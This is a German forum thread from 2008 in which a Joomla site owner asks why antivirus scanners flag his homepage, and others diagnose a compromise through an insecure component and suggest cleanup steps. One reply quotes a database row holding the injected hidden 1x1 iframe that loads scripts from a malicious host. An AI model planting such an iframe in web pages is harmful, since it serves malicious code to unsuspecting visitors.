Virescanneralarm bei Seitenaufruf

**mkern** · 02.01.2008 14:07

Hallo,

da ich kein passende Posting gefunden habe, hier ein neuer Thread. Ich habe das Problem, dass beim Aufruf meiner Joomla Startseite, etwaige Virenscanner Alarm schlagen. Schaut man sich an was passiert, so wird ein iframe-Aufruf auf die wp-stats-php.info) aufgrufen. Innerhalb der Module und des Contents, ist dieser Iframe allerdings nicht zu finden.
Schaut man sich über den Explorer direkt den Quelltext an, taucht der entsprechende iframe code auf.

Ich weiss solangsam nicht mehr wo ich suchen soll.

Wäre somit für Hilfe dankbar.

Gruß
Matthias

**rickkp** · 02.01.2008 14:55

Vermutlich wurdest du gehackt.

Schau dir meine Signatur an und vergleiche die Liste der unsicheren Komponenten mit deinen installierten. Suche hier im Sicherheit Forum nach Exploit und vergleiche diese mit deinen installierten Komponenten.

Mach ein Backup deiner Joomla Dateien und der Datenbank!
Lösche deine Joomla Dateien!
Durchsuche die Datenbank nach dubiosem Code!

Um nicht sofort wieder gehackt zu werden, empfehle ich deine Seite mit einer htaccess vor öffentlichem Zugriff zu schützen.

Spiele ein Backup ein!

Entferne die Komponenten für die es keine Fix gibt!
Installiere für die Komponenten den Fix falls verfügbar!
Aktualisiere auf die Aktuelle Joomla Version 1.0.13!

Entferne die Passwort htaccess und aktiviere die Joomla eigene htaccess.

**WebAdmin** · 02.01.2008 20:41

Zitat von rickkp

Vermutlich wurdest du gehackt.

Um nicht sofort wieder gehackt zu werden, empfehle ich deine Seite mit einer htaccess vor öffentlichem Zugriff zu schützen.

Spiele ein Backup ein!

Entferne die Komponenten für die es keine Fix gibt!
Installiere für die Komponenten den Fix falls verfügbar!
Aktualisiere auf die Aktuelle Joomla Version 1.0.13!

Entferne die Passwort htaccess und aktiviere die Joomla eigene htaccess.

Noch besser, die .htaccess ins root von Joomla und den Adminordner mit einer "Passwort htaccess" zusätzlich schützen.

Das sollte so eigentlich längst Standard sein.

Gruß, WebAdmin

**flotte** · 02.01.2008 23:50

Zitat von mkern

...Ich habe das Problem, dass beim Aufruf meiner Joomla Startseite, etwaige Virenscanner Alarm schlagen. Schaut man sich an was passiert, so wird ein iframe-Aufruf auf die wp-stats-php.info) aufgrufen. Innerhalb der Module und des Contents, ist dieser Iframe allerdings nicht zu finden.
Schaut man sich über den Explorer direkt den Quelltext an, taucht der entsprechende iframe code auf...

Der HTML-Code wird JavaScript-codiert in den Sourcen vorhanden sein. Suche nach "iframe" wird daher nicht funktionieren.

Sofern dies so ist, stellt sich die Frage, wie der Code dahingekommen ist.
Aller Wahrscheinlichkeit nach hat jemand Deine Sourcen geändert - Du wurdest also "gehackt", wie man so schön sagt. Nimm die Seite auf jeden Fall erst mal offline, sofern Du nciht wissentlich Schadcode verteilen wisst.
Alles weitere zum Vorhehen bei gehackten Seiten: Lies die Tips hier im Forum.

**mkern** · 03.01.2008 10:23

Hallo,

vielen Dank für die Hinweise und Informationen. Es scheint tatsächlich ein "gehacktes" Modul gewesen zu sein, von dem ich es allerdings am wenigsten erwartet hätte (expose gallery, wie es scheint). Habe entsprechend euren/ihren empfehlungen die Sicherheitseinstellungen angepasst (.htaccess) sowie das modul erstmal vom start genommen. Vernünftige Alternativen scheint es zur Expose Gallery aber leider nicht zu geben.

Aber nochmals. Vielen Dank.

Gruß
Matthias

**loleke** · 10.01.2008 16:33

Hallo!

Ich habe momentan das selbe Problem.
Habe mal meine Datenbank durchstöbert und das gefunden.
--
-- Daten für Tabelle `jos_modules`
--
...
...
(58, 'Joomla Info', ' <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> ', 23, 'left', 0, '0000-00-00 00:00:00', 1, '', 0, 0, 0, 'moduleclass_sfx=-tikeim\r\ncache=0\r\nfirebots=0\r\nrssurl=\r\nrsst itle=0\r\nrssdesc=0\r\nrssimage=0\r\nrssitems=0\r\ nrssitemdesc=0\r\nword_count=0\r\nrsscache=3600\r\ n', 0, 0),

kann jemand damit was anfangen???

**keraM** · 10.01.2008 17:54

Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums.

**loleke** · 10.01.2008 18:45

Zitat von keraM

Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums.

mag ja gut und schön sein, allerings hat mich die suchfunktion nur zu diesem beitrag weiterverholfen. und zu dem kannst du mir auch glauben, dass ich die 5 beiträge mir schon durchgelesen habe, sie mich aber nur teilweise weitergebracht haben, sonst hätte ich hier bestimmt auch nichts geschrieben!

**el_bastardo** · 10.01.2008 19:05

dieser hack tauchte schon des öfteren bei wordpress blogs auf. deshalb die tarnung als wp-stats.php.
von der seite wp-stats-php.info wird irgendwelches javascript in den iframe geladen,das sicher nichts gutes im sinn hat. google jedenfalls sanktioniert diese infizierten seiten. deshalb schnell was unternehmen wenn dir dein page-rank lieb ist.
wordpress scheint durch ein update darauf reagiert zu haben. bei joomla wir der iframe wohl über eine unsichere komponente eingeschleust.

**loleke** · 10.01.2008 19:13

Zitat von el_bastardo

dieser hack tauchte schon des öfteren bei wordpress blogs auf. deshalb die tarnung als wp-stats.php.
von der seite wp-stats-php.info wird irgendwelches javascript in den iframe geladen,das sicher nichts gutes im sinn hat. google jedenfalls sanktioniert diese infizierten seiten. deshalb schnell was unternehmen wenn dir dein page-rank lieb ist.
wordpress scheint durch ein update darauf reagiert zu haben. bei joomla wir der iframe wohl über eine unsichere komponente eingeschleust.

supi danke... habe das modul jetzt erstmal deaktiviert. dürfte ja da erstmal nichts passieren, oder??

Thema: Virescanneralarm bei Seitenaufruf

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Virescanneralarm bei Seitenaufruf

Lesezeichen

Lesezeichen

Berechtigungen